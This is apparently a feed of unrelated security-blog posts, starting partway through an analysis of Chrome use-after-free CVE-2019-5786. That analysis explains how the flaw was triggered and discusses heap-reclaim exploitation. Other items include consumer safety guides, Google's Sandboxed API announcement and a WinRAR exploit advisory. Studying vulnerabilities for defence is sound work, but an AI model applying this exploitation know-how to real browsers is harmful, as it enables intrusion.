To sum up what is going on here, we create a Blob that we pass to the FileReader. We register a callback to the progress event and, when the event is invoked, we try to access multiple times the result from the reader. We have seen previously that the data needs to be fully loaded (that is why we check the size of the buffer) and if we get multiple DOMArrayBuffer with the same backing ArrayBuffer, they should appear to be to separate objects to JavaScript (hence the equality test). Finally, to double check we have indeed two different objects backed by the same buffer, we create views to modify the underlying data and we verify that modify one modifies the other as well.

There is an unfortunate issue that we had not foreseen: the progress event is not called frequently, so we have to load a really large array in order to force the process to take some time and trigger the event multiple times. There might be better ways of doing so (maybe the Google bug report will reveal one!) but all the attempts to create a slow loading object were a failure (using a Proxy, extending the Blob class…). The loading is tied to a Mojo Pipe, so exposing MojoJS could be a way of having more control as well but it seems unrealistic in an attacker scenario as this is the entry point of the attack. See [9] for an example for that approach.

3.4 Causing a crash

So, now that we have figured out how to get into the code path that is vulnerable, how do we exploit it? This was definitely the hardest question to answer, and this paragraph is meant to share the process to find an answer to that question.

We have seen that the underlying ArrayBuffer is refcounted, so it is unlikely we’ll be able to magically free it by just getting garbage collected from some of the DOMArrayBuffer we’ve obtained. Overflowing the refcount sounds like a fun idea, but if we try by hand to modify the refcount value to be near its maximum value (via x64dbg) and see what happens… well, the process crashes. Finally, we cannot do much on those ArrayBuffers; we can change their content but not their size, nor can we manually free them…
Not being familiar enough with the codebase, the best approach then is to pour through various bug reports that mention use-after-free, ArrayBuffer, etc., and see what people did or talked about. There must be some assumption somewhere that a DOMArrayBuffer owns its underlying memory, and that is an assumption we know we are breaking.
After some searching, we started to find some interesting comments like this one [10a] and this one [10b]. Those two links talk about various situation where DOMArrayBuffer gets externalized, transferred and neutered. We are not familiar with those terms, but from the context it sounds like when this happens, the ownership of the memory is transferred to somebody else. That sounds pretty perfect for us as we want the underlying buffer to be freed (as we are hunting for a use-after-free).
The use-after-free in WebAudio shows us how to get our ArrayBuffer “transferred” so let’s try that!

 

And as seen in the debugger:

The memory being dereferenced is in ECX (we also have EAX == 0 but that’s because we’re looking at the first item in the view). The address looks valid, but it isn’t. ECX contains the address where the raw data of our buffer was stored (the AAAAA…) but because it got freed, the system unmapped the pages that held it, causing the access violation (we’re trying to access an unmapped memory address). We reached the use-after-free we were looking for!

4. Exploit considerations and next steps

4.1 Exploit

It is not the point of this document to illustrate how to push beyond the use-after-free to get full code execution (in fact Exodus have released a blog and a working exploit roughly coinciding with the timing of this publication). However, there are some interesting comments to be made.
Due to the way we are triggering the use-after-free, we are ending up with a very large buffer unallocated. The usual way to exploit a use-after-free is to get a new object allocated on top of the freed region to create some sort of confusion. Here, we are freeing the raw memory that is used to back the data of our ArrayBuffer. That is great because we can read/write over a large region. Yet, a problem in this approach is that because the memory region is really large, there is no one object that would just fit in. If we had a small buffer, we could create lots of objects that have that specific size and hope one would be allocated there. Here it is harder because we need to wait that until that memory is reclaimed by the heap for unrelated objects. On Windows 10 64-bit, it is hard because of how random allocations are, and the entropy available for random addresses. On Windows 7 32-bit, it is much easier as the address space is much smaller, and the heap allocation is more deterministic. Allocating a 10k object might be enough to have some metadata land within the address space we can control.
The second interesting aspect is that because we are going to dereference a region that has been unmapped, if the 10k allocation mentioned above fails to allocate at least one object in that area we control, then we are out of luck; we will get an access violation and the process will die. There are ways to make this step more reliable, such as the iframe method described here [11]
An example on how to move on if one can corrupt the metadata of a JavaScript object can be found here [12].

4.2 Next step

Once an attacker has gained code execution inside the renderer process they are still limited by the sandbox. In the exploit found in the wild, the attacker used a second 0-day that targeted the Windows Kernel to escape the sandbox. A write up describing that exploit was recently released by the 360CoreSec here [13].

5. Conclusion

By looking at the commit that fixed the bug and hunting down hints and similar fixes we were able to recover the likely path towards exploitation. Once again, we can see that modern mitigations introduced in the later version of Windows makes life way harder on attackers and we should celebrate those wins from the defensive side. Also, Google is extremely efficient and aggressive in its patching strategy, and most of its user base will have already seamlessly updated to the latest version of Chrome.

 

Links

[1] https://chromereleases.googleblog.com/2019/03/stable-channel-update-for-desktop.html
[2] https://security.googleblog.com/2019/03/disclosing-vulnerabilities-to-protect.html
[2b] https://bugs.chromium.org/p/chromium/issues/detail?id=936448
[3] https://chromium.googlesource.com/chromium/src/+log/72.0.3626.119..72.0.3626.121?pretty=fuller
[3b] https://github.com/chromium/chromium/commit/ba9748e78ec7e9c0d594e7edf7b2c07ea2a90449
[4a] https://github.com/chromium/chromium/blob/17cc212565230c962c1f5d036bab27fe800909f9/third_party/blink/renderer/core/fileapi/file_reader_loader.cc
[4b] https://github.com/chromium/chromium/blob/75ab588a6055a19d23564ef27532349797ad454d/third_party/blink/renderer/core/fileapi/file_reader_loader.cc
[5] https://www.chromium.org/developers/smart-pointer-guidelines
[6a] https://chromium.googlesource.com/chromium/src/+/lkgr/styleguide/c++/c++.md#object-ownership-and-calling-conventions
[6b] https://www.chromium.org/rvalue-references
[7] https://developer.mozilla.org/en-US/docs/Web/API/FileReader
[8] https://commondatastorage.googleapis.com/chromium-browser-snapshots/index.html?prefix=Win_x64/612439/
[9] https://www.exploit-db.com/exploits/46475
[10a] https://bugs.chromium.org/p/v8/issues/detail?id=2802
[10b] https://bugs.chromium.org/p/chromium/issues/detail?id=761801
[11] https://blog.exodusintel.com/2019/01/22/exploiting-the-magellan-bug-on-64-bit-chrome-desktop/
[12] https://halbecaf.com/2017/05/24/exploiting-a-v8-oob-write/
[13] http://blogs.360.cn/post/RootCause_CVE-2019-0808_EN.html

The post Analysis of a Chrome Zero Day: CVE-2019-5786 appeared first on McAfee Blogs.

Code makes the world go ‘round. Well, code and love. So love your code.

Your code is powerful, clever and elegant—but is it secure?

More than ever, code makes the world go ‘round. From smart home thermostats to critical infrastructure to integrated clinical environments in hospitals, code runs so much of what touches our lives every day. Sometimes we are explicitly aware that we are interacting with software but increasingly we are not—code runs quietly amid the people, objects and experiences that shape our lives and the broader world we share.

Your code is powerful and so are you: the quality and security of the code that you put out into the world ripples out to affect individuals, organizations, nations. When you consider the reach of your code it is clear that to deliver quality code you must deliver secure code.

As the pressure to deliver software to the market quickly has increased so too have the scope and severity of the risks posed by insecure applications. For example, 85% of all applications we scanned in a recent 12-month period had at least one vulnerability in them, and more than 13% had a critical severity flaw. The most common flaws found are some of the most easily exploited: SQL injection flaws are present in nearly one in three applications and cross-site scripting vulnerabilities are present in nearly half of applications tested.

It’s not all gloom and doom, we promise. Here’s some sunshine for you: writing secure code does not take longer than writing insecure code. Sit with that idea for a few seconds. This assertion might seem counterintuitive as you consider the pressure to ship code more and more quickly, but taking the time to address security early and often in the development process will get you to shipping quality code faster. A minor flaw left unaddressed early in the software development lifecycle becomes a tangled mess the longer it persists. Unraveling that tangle is neither simple nor quickly done. Finding and fixing flaws early on is an easier path for teams working hard to deliver functional, high quality code to the market.

But where to start? If writing secure code seems like a steep climb, you are not alone. Many developers—most developers in fact—are not introduced to secure coding principles while they are learning to build software.

More good news: developers of all stripes, whenever and however they started coding, have this in common: intellectual curiosity. You are the tinkerers, problem-solvers and lifelong learners who started with your first line of code and have never stopped wondering, perfecting and learning. Coding is a craft and your years of coding have all been about mastering something new and then doing that again and again and again—across new languages, frameworks and approaches to development.

For many developers writing secure code is brand new and yet it has undeniably become part of the process of mastering your craft. A first step is educating yourself on basic secure coding principles and beginning to put these principles into practice every day. In doing so you join developers the world over who are tinkering, learning and growing—united by their shared commitment to put the best possible code out into the world. As you find and fix flaws, you will be learning as you go and writing more and more secure code. Along the way you will notice that you are introducing fewer and fewer flaws into your code to begin with. Fewer messy tangles to pull apart later on. And your team will benefit too. As you build your security knowledge, you will be helping your peers by spotting flaws during code reviews when they are easier to fix. You will be measurably shifting the security of your applications just by starting where you are.

So wherever you are in your own learning process, we offer this toolkit of resources to help you and your team along your path to writing amazing code.

  • Best practices for secure coding
  • How to secure your DevOps environments
  • How to combat the most common software vulnerabilities
  • What developers don’t know about security but should

Secure Coding Best Practices Handbook

What Developers Don’t Know About Security But Should

Whitepapers:

5 Principles for Securing DevOps

Vulnerability Decoder Infosheets:

Insecure Crypto

Encapsulation

Race Condition

Improper Error Handling

Broken Access Controls

Cross-Site Scripting

Insecure Open Source Components

Additional resources

Out of our close work with developers over many years has grown a range of developer-focused resources for learning to code more securely. Beyond the secure coding toolkit, we offer many learning resources—developer training, remediation coaching, the Veracode Community and Greenlight, Veracode’s IDE- or CI-integrated continuous flaw feedback and secure coding education solution.

How Online Scams Drive College Basketball Fans Mad

Sports fans everywhere look forward to mid-March for the NCAA men’s college basketball tournament. However, it’s not just college basketball fans that look forward to this time of year. Cybercriminals use March to launch malicious campaigns in the hopes of gaining access to personal information from unsuspecting fans. Let’s take a look at the most popular techniques cybercriminals use to gain access to passwords and financial information, as well as encourage victims to click on suspicious links.

Online betting provides cybercriminals with a wealth of opportunities to steal personal and financial information from users looking to engage with the games while potentially making a few extra bucks. The American Gaming Association (AGA) estimates that consumers will wager $8.5 billion on the 2019 NCAA men’s basketball tournament. What many users don’t realize is that online pools that ask for your personal and credit card information create a perfect opportunity for cybercriminals to take advantage of unsuspecting fans.

In addition to online betting scams, users should also be on the lookout for malicious streaming sites. As fewer and fewer homes have cable, many users look to online streaming sites to keep up with all of the games. However, even seemingly reputable sites could contain malicious phishing links. If a streaming site asks you to download a “player” to watch the games, there’s a possibility that you could end up with a nasty malware on your computer.

Ticket scammers are also on the prowl during March, distributing fake tickets on classified sites they’ve designed to look just like the real thing. Of course, these fake tickets all have the same barcode. With these scams floating around the internet, users looking for cheap tickets to the games may be more susceptible to buying counterfeit tickets if they are just looking for the best deal online and are too hasty in their purchase.

So, if you’re a college basketball fan hoping to partake in this exciting month – what next? In order to enjoy the fun that comes with the NCAA tournament without the risk of cyberthreats, check out the following tips to help you box out cybercriminals this March:

  • Verify the legitimacy of gambling sites. Before creating a new account or providing any personal information on an online gambling website, poke around and look for information any legitimate site would have. Most gambling sites will have information about the site rules (i.e., age requirements) and contact information. If you can’t find such information, you’re better off not using the site.
  • Be leery of free streaming websites. The content on some of these free streaming websites is likely stolen and hosted in a suspicious manner, as well as potentially contains malware. So, if you’re going to watch the games online, it’s best to purchase a subscription from a legitimate streaming service.
  • Stay cautious on popular sports sites and apps. Cybercriminals know that millions of loyal fans will be logging on to popular sports sites and apps to stay updated on the scores. Be careful when you’re visiting these sites you’re not clicking on any conspicuous ads or links that could contain malware. If you see an offer that interests you in an online ad, you’re better off going directly to the website from the company displaying the ad as opposed to clicking on the ad from the sports site or app.
  • Beware of online ticket scams. Scammers will be looking to steal payment information from fans in search of last-minute tickets to the games. To avoid this, it’s best to buy directly from the venue whenever possible. If you decide to purchase from a reseller, make sure to do your research and only buy from trusted vendors.
  • Use comprehensive security software. Using a tool like McAfee WebAdvisor can help you avoid dangerous websites and links, and will warn you in the event that you do accidentally click on something malicious. It will provide visual warnings if you’re about to go to a suspicious site.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post How Online Scams Drive College Basketball Fans Mad appeared first on McAfee Blogs.

When is it fair to infer?

While the GDPR framework is robust in many respects, it struggles to provide adequate protection against the emerging risks associated with inferred data (sometimes called derived data, profiling data, or inferential data). Inferred data pose potentially significant risks in terms of privacy and/or discrimination, yet they would seem to receive the least protection of the personal data types prescribed by GDPR. Defined as assumptions or predictions about future behaviour, inferred data cannot be verified at the time of decision-making. Consequently, data subjects are often unable to predict, understand or refute these inferences, whilst their privacy rights, identity and reputation are impacted.

Reaching dangerous conclusions

Numerous applications drawing potentially troubling inferences have emerged; Facebook is reported to be able to infer protected attributes such as sexual orientation and race, as well as political opinions and the likelihood of a data subject attempting suicide. Facebook data has also been used by third parties to decide on loan eligibility, to infer political leniencies, to predict views on social issues such as abortion, and to determine susceptibility to depression. Google has attempted to predict flu outbreaks, other diseases and medical outcomes. Microsoft can predict Parkinson’s and Alzheimer’s from search engine interactions. Target can predict pregnancy from purchase history, users’ satisfaction can be determined by mouse tracking, and China infers a social credit scoring system.

What protections does GDPR offer for inferred data?

The European Data Protection Board (EDPB) notes that both verifiable and unverifiable inferences are classified as personal data (for instance, the outcome of a medical assessment regarding a user’s health, or a risk management profile). However it is unclear whether the reasoning and processes that led to the inference are similarly classified. If inferences are deemed to be personal data, should the data protection rights enshrined in GDPR also equally apply?

The data subjects’ right to being informed, right to rectification, right to object to processing, and right to portability are significantly reduced when data is not ‘provided by the data subject’ for example the EDPB note (in their guidelines on the rights to data portability) that “though such data may be part of a profile kept by a data controller and are inferred or derived from the analysis of data provided by the data subject, these data will typically not be considered as “provided by the data subject” and thus will not be within scope of this new right’.

The data subject however can still exercise their “right to obtain from the controller confirmation as to whether or not personal data concerning the data subject has being processed, and, where that is the case, access to the personal data”. The data subject also has the right to information about “the existence of automated decision-making, including profiling (Article 22(1),(4)) meaningful information about the logic involved, as well as the significance and consequences of such processing” (Article 15). However the data subject must actively make such an access request, and if the organisation does not provide the data, how will the data subject know that derived or inferred data is missing from their access request?

A data subject can also object to direct marketing based on profiling and/or have it stopped, however there is no obligation on the controller to inform the data subject that any profiling is taking place – “unless it produces legal or significant effects on the data subject”.

No answer just yet…

Addressing the challenges and tensions of inferred and derived data, will necessitate further case law on the interpretation of “personal data”, particularly regarding interpretations of GDPR. Future case law on the meaning of “legal effects… or similarly significantly affects”, in the context of profiling, would also be helpful. It would also seem reasonable to suggest that where possible data subjects should be informed at collection point, that data is derived by the organisation and for what purposes. If the data subject doesn’t know that an organisation uses their data to infer new data, the data subject cannot exercise fully their data subject rights, since they won’t know that such data exists.

In the meantime, it seems reasonable to suggest that inferred data which has been clearly informed to the data subject, is benevolent in its intentions, and offers the data subject positive enhanced value, is ‘fair’.

The post When is it fair to infer? appeared first on BH Consulting.

Ghosts May Not Be Real but Trolls Are – Look Out for Social Media Trolls

The Cambridge Dictionary describes a troll as “an imaginary, either very large or very small creature in traditional Scandinavian stories, that has magical powers and lives in mountains or caves.”

If you have read your fairy tales, you would know that trolls are generally grotesque creatures that stay away from human habitation. They take pleasure in carrying out antisocial activities and causing people pain and mental suffering.

Those trolls are mythical, but the online trolls are very much real. These digital trolls use the anonymity offered by the net to stay hidden and cause disruption and harm through their malicious and negative comments. They share provocative, malicious content and delight in fomenting unrest. If the victim takes the comments personally, it can leave them emotionally disturbed.

Why do people troll?

Why do people troll? Why do they want to insult, abuse, criticize, hurt and spread negativity? There are many studies available online that offer detailed analysis of how a troll’s mind works. However, we won’t go into such details. For our convenience and easy understanding, it will suffice to say that trolling may be the result of an individual’s background, low empathy levels, anger, frustration, jealousy, sadness and/or bitterness.

  • Low empathy: There are people who have less empathy or sensitivity and often find grim or disturbing situations funny. They will, for e.g.; not think twice about posting a joke on a social media thread where everyone is offering condolence on the demise of a loved one. They may see nothing wrong in it, rather it may give them a laugh.
  • Inflexible attitude: Some people find it difficult to accept that others too can have their individual viewpoints and instinctively target people with different opinions as enemies and make it their mission to abuse them, as if to prove that they are wrong. They hamper freedom of speech online for they do try to desist other users from sharing their personal opinions.
  • Revenge: Some go on a rampage to seek revenge for the ‘wrong’ done to them or someone else.

The anonymity provided by the net enables many cowardly people to feel strong by attacking others and give vent to their emotions online.

How do you identify trolls?

Easy. They are the rabble rousers, the ones who have nothing positive to contribute but are only out to disrupt, disturb and upset you. Their posts may vary from personal comments on your photo, satirical outbursts on your blogs or videos or direct attacks on your person, to out-of-context malicious remarks in an ongoing discussion. They would definitely be using a false bio and either no profile pic or a false one.

What do you do if you are trolled?

  • Avoid feeding them – they thrive on your emotional upheaval and vituperative responses. The smart thing to do is to neither acknowledge their comments nor respond to them. Nothing is as putting off as an IGNORE.
  • Keep records and block – If the trolling continues, keep records and block account of the troll and report to the platform. Let your friends know about the account too.
  • Consider keeping commenting off on your YouTube channel – you may also choose to delete negative comments.
  • Make amendments to posts – if factual or grammatical errors or an archaic style of writing your posts or blogs have brought out the trolls, consider apologizing for the errors and making revisions. Reply positively, thanking the troll for the feedback. You will take the wind out of the troll’s sails.
  • Don’t take it to heart – adults may use humour to counter trolls online, but it may not be easy for teens to keep emotions aside and reply to abusive comments lightly. So, it’s best to ignore.

As a digital parent, you may already be aware of trolls and the emotional havoc they can cause. You want to protect your kids from their attacks when they go online. At the same time, you need to explain to them why trolling is wrong and sometimes funny isn’t funny at all but may be hurtful and nasty.

How to ensure your kids know it’s wrong to troll?

  • Good manners: Whether online or off it, there is no substitute to good manners and etiquette. Ensure your kids feel happy and secure at home. Model the kind of behavior you expect from them and reward good manners with appreciation.
  • Empathy: The world runs on kindness and empathy. Reinforce empathy right from childhood. They need to understand that there are all kinds of people and each one is special in some way. Help them grow up to be generous, tolerant and broad-minded people.
  • Positivity: A child with a positive outlook and sunny disposition is most unlikely to be rude and deliberately mean online. Lay stress on being positive, whatever the situation may be.
  • Monitoring: It is recommended that parents monitor the conversations kids have online. Avoid participating in their conversations or taking to task those who maybe bullying or trolling them, for though this will delight the troll, it will be embarrassing for the child. Instead, have discussions on how he/she plans to handle it and let him/her tackle the issue.
  • Last but not the least, ensure all your devices are installed with licensed comprehensive security software that offers the parental controls feature. This will allow you to monitor activities remotely, though you should keep your child informed that you are doing so.

One last word: we cannot make trolls vanish, but we can empower our kids to vanquish them.

The post Ghosts May Not Be Real but Trolls Are – Look Out for Social Media Trolls appeared first on McAfee Blogs.

Kali Linux Micro Hacking Station Raspberry Pi

Kali Linux Micro Hacking Station Raspberry Pi   Raspberry Pi is a small pocket sized low cost computer. Today we will be setting up Kali Linux on Raspberry Pi. We can use Kali Linux on Raspberry Pi to hack WiFi passwords, launch various social engineering attacks, Set up rogue access points and a wide range […]

The post Kali Linux Micro Hacking Station Raspberry Pi appeared first on HackingVision.

Open-sourcing Sandboxed API



Many software projects process data which is externally generated, and thus potentially untrusted. For example, this could be the conversion of user-provided picture files into different formats, or even executing user-generated software code.
When a software library parsing such data is sufficiently complex, it might fall victim to certain types of security vulnerabilities: memory corruption bugs or certain other types of problems related to the parsing logic (e.g. path traversal issues). Those vulnerabilities can have serious security implications.

In order to mitigate those problems, developers frequently employ software isolation methods, a process commonly referred to as sandboxing. By using sandboxing methods, developers make sure that only resources (files, networking connections and other operating system resources) which are deemed necessary are accessible to the code involved in parsing user-generated content. In the worst-case scenario, when potential attackers gain remote code execution rights within the scope of a software project, a sandboxing technique can contain them, protecting the rest of the software infrastructure.

Sandboxing techniques must be highly resistant to attacks and sufficiently protect the rest of the operating system, yet must be sufficiently easy-to-use for software developers. Many popular software containment tools might not sufficiently isolate the rest of the OS, and those which do, might require time-consuming redefinition of security boundaries for each and every project that should be sandboxed.

Sandbox once, use anywhere

To help with this task, we are open-sourcing our battle-tested project called Sandboxed API. Sandboxed API makes it possible to create security policies for individual software libraries. This concept allows to create reusable and secure implementations of functionality residing within popular software libraries, yet is granular enough to protect the rest of used software infrastructure.

As Sandboxed API serves the purpose of accessing individual software functions inside a sandboxed library, we are also making publicly available our core sandboxing project, Sandbox2. This is now part of Sandboxed API and provides the underlying sandboxing primitives. It can be also used standalone to isolate arbitrary Linux processes, but is considered a lower-level API.

Overview

Sandboxed API is currently implemented for software libraries written in the C programming language (or providing C bindings), though we might add support for more programming runtimes in the future.

From a high-level perspective, Sandboxed API separates the library to be sandboxed and its callers into two separate OS processes: the host binary and the sandboxee. Actual library calls are then marshalled by an API object on the host side and send via interprocess communication to the sandboxee where an RPC stub unmarshals and forwards calls to the original library.

Both the API object (SAPI object) and the RPC stub are provided by the project, with the former being auto-generated by an interface generator. Users just need to provide a sandbox policy, a set of system calls that the underlying library is allowed to make, as well as the resources it is allowed to access and use. Once ready, a library based on sandboxed API can easily be reused in other projects.

The resulting API of the SAPI object is similar to the one of the original library. For example, when using zlib, the popular compression library, a code snippet like this compresses a chunk of data (error handling omitted for brevity):


void Compress(const std::string& chunk, std::string* out) {
 z_stream zst{};
 constexpr char kZlibVersion[] = "1.2.11";
 CHECK(deflateInit_(&zst, /*level=*/4, kZlibVersion, sizeof(zst)) == Z_OK);

 zst.avail_in = chunk.size();
 zst.next_in = reinterpret_cast<uint8_t*>(&chunk[0]);
 zst.avail_out = out->size();
 zst.next_out = reinterpret_cast<uint8_t*>(&(*out)[0]);
 CHECK(deflate(&zst, Z_FINISH) != Z_STREAM_ERROR);
 out->resize(zst.avail_out);

 deflateEnd(&zst);
}


Using Sandboxed API, this becomes:
void CompressSapi(const std::string& chunk, std::string* out) {
 sapi::Sandbox sandbox(sapi::zlib::zlib_sapi_embed_create());
 CHECK(sandbox.Init().ok());
 sapi::zlib::ZlibApi api(&sandbox);

 sapi::v::Array<uint8_t> s_chunk(&chunk[0], chunk.size());
 sapi::v::Array<uint8_t> s_out(&(*out)[0], out->size());
 CHECK(sandbox.Allocate(&s_chunk).ok() && sandbox.Allocate(&s_out).ok());
 sapi::v::Struct<sapi::zlib::z_stream> s_zst;
 
 constexpr char kZlibVersion[] = "1.2.11";
 sapi::v::Array<char> s_version(kZlibVersion, ABSL_ARRAYSIZE(kZlibVersion));
 CHECK(api.deflateInit_(s_zst.PtrBoth(), /*level=*/4, s_version.PtrBefore(),
                         sizeof(sapi::zlib::z_stream).ValueOrDie() == Z_OK));

 CHECK(sandbox.TransferToSandboxee(&s_chunk).ok());
 s_zst.mutable_data()->avail_in = chunk.size();
 s_zst.mutable_data()->next_in = reinterpet_cast<uint8_t*>(s_chunk.GetRemote());
 s_zst.mutable_data()->avail_out = out->size();
 s_zst.mutable_data()->next_out = reinterpret_cast<uint8_t*>(s_out.GetRemote());
 CHECK(api.deflate(s_zst.PtrBoth(), Z_FINISH).ValueOrDie() != Z_STREAM_ERROR);
 CHECK(sandbox.TransferFromSandboxee(&s_out).ok());
 out->resize(s_zst.data().avail_out);

 CHECK(api.deflateEnd(s_zst.PtrBoth()).ok());
}
As you can see, when using Sandboxed API there is extra code for setting up the sandbox itself and for transferring memory to and from the sandboxee, but other than that, the code flow stays the same.

Try for yourself

It only takes a few moments to get up and running with Sandboxed API. If Bazel is installed:
sudo apt-get install python-typing python-clang-7 libclang-7-dev linux-libc-dev
git clone github.com/google/sandboxed-api && cd sandboxed-api
bazel test //sandboxed_api/examples/stringop:main_stringop
This will download the necessary dependencies and run the project through its paces. More detailed instructions can be found in our Getting Started guide and be sure to check out the examples for Sandboxed API.

Where do we go from here?

Sandboxed API and Sandbox2 are used by many teams at Google. While the project is mature, we do have plans for the future beyond just maintaining it:

  • Support more operating systems - So far, only Linux is supported. We will look into bringing Sandboxed API to the Unix-like systems like the BSDs (FreeBSD, OpenBSD) and macOS. A Windows port is a bigger undertaking and will require some more groundwork to be done.
  • New sandboxing technologies - With things like hardware-virtualization becoming almost ubiquitous, confining code into VMs for sandboxing opens up new possibilities.
  • Build system - Right now, we are using Bazel to build everything, including dependencies. We acknowledge that this is not how everyone will want to use it, so CMake support is high on our priority list.
  • Spread the word - Use Sandboxed API to secure open source projects. If you want to get involved, this work is also eligible for the Patch Reward Program.
Get involved

We are constantly looking at improving Sandboxed API and Sandbox2 as well as adding more features: supporting more programming runtimes, different operating systems or alternative containment technologies.

Check out the Sandboxed API GitHub repository. We will be happy to consider your contributions and look forward to any suggestions to help improve and extend this code.

Weekly Update 130

Weekly Update 130

Well that was a hell of a week of travel. Seriously, the Denver situation was just an absolute mess but when looking at the video from the day I was meant to fly in, maybe being stuck in LA wasn't such a bad thing after all:

But despite the dramas I did still (just) make it and got to do my talk so as close as it was, I'm still yet to miss one. This week I'm talking about a bunch of different travel things, upcoming events, data breaches and those ridiculous bloody cookie warnings everyone hates so much. Next week I'll be in Seattle and will probably also be pushing the update out a little late, but I will still be pushing it out. Until then, here's the week that was:

Weekly Update 130
Weekly Update 130
Weekly Update 130

References

  1. I'll be keynoting at the Akamai Security Summit World tour in Sydney (it's on Thursday 28 of this month)
  2. Then I'll be doing another NDC meetup in Sydney (like Brisbane and Melbourne, that event will be oversubscribed so get in early)
  3. ixigo denies a breach (but resets everyone's passwords anyway...)
  4. These cookie warnings are absolutely ridiculous (they always were, but GDPR just continues the insanity)
  5. Ad blockers are also part of this whole problem (killing all ads - even those run responsibly - just makes the whole thing even worse)
  6. Varonis is this week's blog sponsor (watch their DFIR team investigate a cyberattack using their data-centric security stack)

How to Safeguard Your Family Against A Medical Data Breach

Medical Data BreachThe risk to your family’s healthcare data often begins with that piece of paper on a clipboard your physician or hospital asks you to fill out or in the online application for healthcare you completed.

That data gets transferred into a computer where a patient Electronic Health Record (EHR) is created or added to. From there, depending on the security measures your physician, healthcare facility, or healthcare provider has put in place, your data is either safely stored or up for grabs.

It’s a double-edged sword: We all need healthcare but to access it we have to hand over our most sensitive data armed only with the hope that the people on the other side of the glass window will do their part to protect it.

Breaches on the Rise

Feeling a tad vulnerable? You aren’t alone. The stats on medical breaches don’t do much to assuage consumer fears.

A recent study in the Journal of the American Medical Association reveals that the number of annual health data breaches increased 70% over the past seven years, with 75% of the breached, lost, or stolen records being breached by a hacking or IT incident at a cost close to consumers at nearly $6 billion.

The IoT Factor

Medical Data Breach

Not only are medical facilities vulnerable to hackers, but with the growth of the Internet of Things (IoT) consumer products — which, in short, means everything is digitally connected to everything else — also provide entry points for hackers. Wireless devices at risk include insulin pumps and monitors, Fitbits, scales, thermometers, heart and blood pressure monitors.

To protect yourself when using these devices, experts recommend staying on top of device updates and inputting as little personal information as possible when launching and maintaining the app or device.

The Dark Web

The engine driving healthcare attacks of all kinds is the Dark Web where criminals can buy, sell, and trade stolen consumer data without detection. Healthcare data is precious because it often includes a much more complete picture of a person including social security number, credit card/banking information, birthdate, address, health care card information, and patient history.

With this kind of data, many corrupt acts are possible including identity theft, fraudulent medical claims, tax fraud, credit card fraud, and the list goes on. Complete medical profiles garner higher prices on the Dark Web.

Some of the most valuable data to criminals are children’s health information (stolen from pediatrician offices) since a child’s credit records are clean and more useful tools in credit card fraud.

According to Raj Samani, Chief Scientist and McAfee Fellow, Advanced Threat Research, predictions for 2019 include criminals working even more diligently in the Dark Web marketplace to devise and launch more significant threats.

“The game of cat and mouse the security industry plays with ransomware developers will escalate, and the industry will need to respond more quickly and effectively than ever before,” Says Samani.

Medical Data Breach

Healthcare professionals, hospitals, and health insurance companies, while giving criminals an entry point, though responsible, aren’t the bad guys. They are being fined by the government for breaches and lack of proper security, and targeted and extorted by cyber crooks, while simultaneously focusing on patient care and outcomes. Another factor working against them is the lack of qualified cybersecurity professionals equipped to protect healthcare practices and facilities.

Protecting ourselves and our families in the face of this kind of threat can feel overwhelming and even futile. It’s not. Every layer of protection you build between you and a hacker, matters. There are some things you can do to strengthen your family’s healthcare data practices.

Ways to Safeguard Medical Data

Don’t be quick to share your SSN. Your family’s patient information needs to be treated like financial data because it has that same power. For that reason, don’t give away your Social Security Number — even if a medical provider asks for it. The American Medical Association (AMA) discourages medical professionals from collecting patient SSNs nowadays in light of all the security breaches.

Keep your healthcare card close. Treat your healthcare card like a banking card. Know where it is, only offer it to physicians when checking in for an appointment, and report it immediately if it’s missing.

Monitor statements. The Federal Trade Commission recommends consumers keep a close eye on medical bills. If someone has compromised your data, you will notice bogus charges right away. Pay close attention to your “explanation of benefits,” and immediately contact your healthcare provider if anything appears suspicious.

Ask about security. While it’s not likely you can change your healthcare provider’s security practices on the spot, the more consumers inquire about security standards, the more accountable healthcare providers are to following strong data protection practices.

Pay attention to apps, wearables. Understand how app owners are using your data. Where is the data stored? Who is it shared with? If the app seems sketchy on privacy, find a better one.

How to Protect IoT Devices

Medical Data Breach

According to the Federal Bureau of Investigation (FBI), IoT devices, while improving medical care and outcomes, have their own set of safety precautions consumers need to follow.

  • Change default usernames and passwords
  • Isolate IoT devices on their protected networks
  • Configure network firewalls to inhibit traffic from unauthorized IP addresses
  • Implement security recommendations from the device manufacturer and, if appropriate, turn off devices when not in use
  • Visit reputable websites that specialize in cybersecurity analysis when purchasing an IoT device
  • Ensure devices and their associated security patches are up-to-date
  • Apply cybersecurity best practices when connecting devices to a wireless network
  • Invest in a secure router with appropriate security and authentication practices

The post How to Safeguard Your Family Against A Medical Data Breach appeared first on McAfee Blogs.

Protecting kids online – are we doing our best?

I’m trying to work through some thoughts about how companies repeatedly take advantage of consumers’ privacy in the US.  The latest being TikTok, a video sharing app acquired from musical.ly, which has agreed to pay $5.7 million to settle allegations that it collected personal information from children – a violation of COPPA or the Children’s […]

The post Protecting kids online – are we doing our best? appeared first on Privacy Ref Blog.

Attackers Exploiting WinRAR UNACEV2.DLL Vulnerability (CVE-2018-20250)

Earlier this month Check Point Research reported discovery of a 19 year old code execution vulnerability in the wildly popular WinRAR compression tool. Rarlab reports that that are over 500 million users of this program. While a patched version, 5.70, was released on February 26, attackers are releasing exploits in an effort to reach vulnerable systems before they can be patched.

One recent example piggybacks on a bootlegged copy of Ariana Grande’s hit album “Thank U, Next” with a file name of “Ariana_Grande-thank_u,_next(2019)_[320].rar”

When a vulnerable version of WinRAR is used to extract the contents of this archive, a malicious payload is created in the Startup folder behind the scenes. User Account Control (UAC) does not apply, so no alert is displayed to the user. The next time the system restarts, the malware is run.

Figure 1 – Malformed Archive detected by McAfee as CVE2018-20250!4A63011F5B88
SHA256: e6e5530ed748283d4f6ef3485bfbf84ae573289ad28db0815f711dc45f448bec

Figure 2 – Extracted non-malicious MP3 files

Figure 3 – Extracted Malware payload detected by McAfee as Generic Trojan.i
SHA256: A1C06018B4E331F95A0E33B47F0FAA5CB6A084D15FEC30772923269669F4BC91

In the first week since the vulnerability was disclosed, McAfee has identified over 100 unique exploits and counting, with most of the initial targets residing in the United States at the time of writing.

 

McAfee advises users to keep their anti-malware signatures up to date at all times. McAfee products detect known and unknown malformed ACE files exploiting the vulnerability as CVE2018-20250![Partial hash] starting with the following content

  • V2 DATs version 9183 released March 2, 2019
  • V3 DATs version 3634 released March 2, 2019

